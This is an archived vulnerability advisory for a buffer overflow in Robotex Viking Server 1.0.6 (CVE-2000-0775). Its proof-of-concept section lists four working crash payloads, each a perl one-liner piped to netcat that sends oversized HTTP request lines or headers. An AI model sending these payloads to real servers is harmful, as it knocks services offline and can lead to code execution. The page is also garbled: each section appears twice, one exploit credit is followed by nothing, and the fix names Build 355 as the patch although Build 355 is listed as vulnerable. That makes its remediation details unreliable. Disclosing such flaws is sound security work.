Robotex Viking Server Buffer Overflow Vulnerability
BID:1614
Info
Robotex Viking Server Buffer Overflow Vulnerability
| Bugtraq ID: | 1614 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2000-0775 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Aug 28 2000 12:00AM |
| Updated: | Jul 11 2009 02:56AM |
| Credit: | Posted to Bugtraq on August 28, 2000 by Aviram Jenik <[email protected]>. |
| Vulnerable: |
RobTex Viking Server 1.0.6 Build 355 |
| Not Vulnerable: |
RobTex Viking Server 1.0.6 Build 370 |
Discussion
Robotex Viking Server Buffer Overflow Vulnerability
A number of unchecked buffers exists in Robotex Viking Server. This enables a malicious user to either crash the application or execute arbitrary code, depending on the data supplied.
A number of unchecked buffers exists in Robotex Viking Server. This enables a malicious user to either crash the application or execute arbitrary code, depending on the data supplied.
Exploit / POC
Robotex Viking Server Buffer Overflow Vulnerability
The following commands will crash Viking Server:
1)
GET [x11765] HTTP/1.1<enter><enter>
(Cmd: perl -e "print \"GET @{['x'x11765]} HTTP/1.1\n\n\""|nc 127.1 80)
2)
GET / HTTP/1.1<enter>
Unless-Modified-Since: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nUnless-Modified-Since: @{['x'x14765]}\n\n\""|nc 127.1 80)
3)
GET / HTTP/1.1<enter>
If-Range: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Range: @{['x'x14765]}\n\n\""|nc 127.1 80)
4)
GET / HTTP/1.1<enter>
If-Modified-Since: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Modified-Since: @{['x'x14765]}\n\n\""|nc 127.1 80)
WildCoyote <[email protected]> has released the following exploit:
The following commands will crash Viking Server:
1)
GET [x11765] HTTP/1.1<enter><enter>
(Cmd: perl -e "print \"GET @{['x'x11765]} HTTP/1.1\n\n\""|nc 127.1 80)
2)
GET / HTTP/1.1<enter>
Unless-Modified-Since: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nUnless-Modified-Since: @{['x'x14765]}\n\n\""|nc 127.1 80)
3)
GET / HTTP/1.1<enter>
If-Range: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Range: @{['x'x14765]}\n\n\""|nc 127.1 80)
4)
GET / HTTP/1.1<enter>
If-Modified-Since: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Modified-Since: @{['x'x14765]}\n\n\""|nc 127.1 80)
WildCoyote <[email protected]> has released the following exploit:
Solution / Fix
Robotex Viking Server Buffer Overflow Vulnerability
Solution:
Robotex has released the following patch which eliminates the vulnerability:
RobTex Viking Server 1.0.6 Build 355
Solution:
Robotex has released the following patch which eliminates the vulnerability:
RobTex Viking Server 1.0.6 Build 355
-
RobTex viking
http://www.robtex.com/files/viking/beta/viking.zip
References
Robotex Viking Server Buffer Overflow Vulnerability
References:
References:
- Viking Server Product Homepage (Robotex)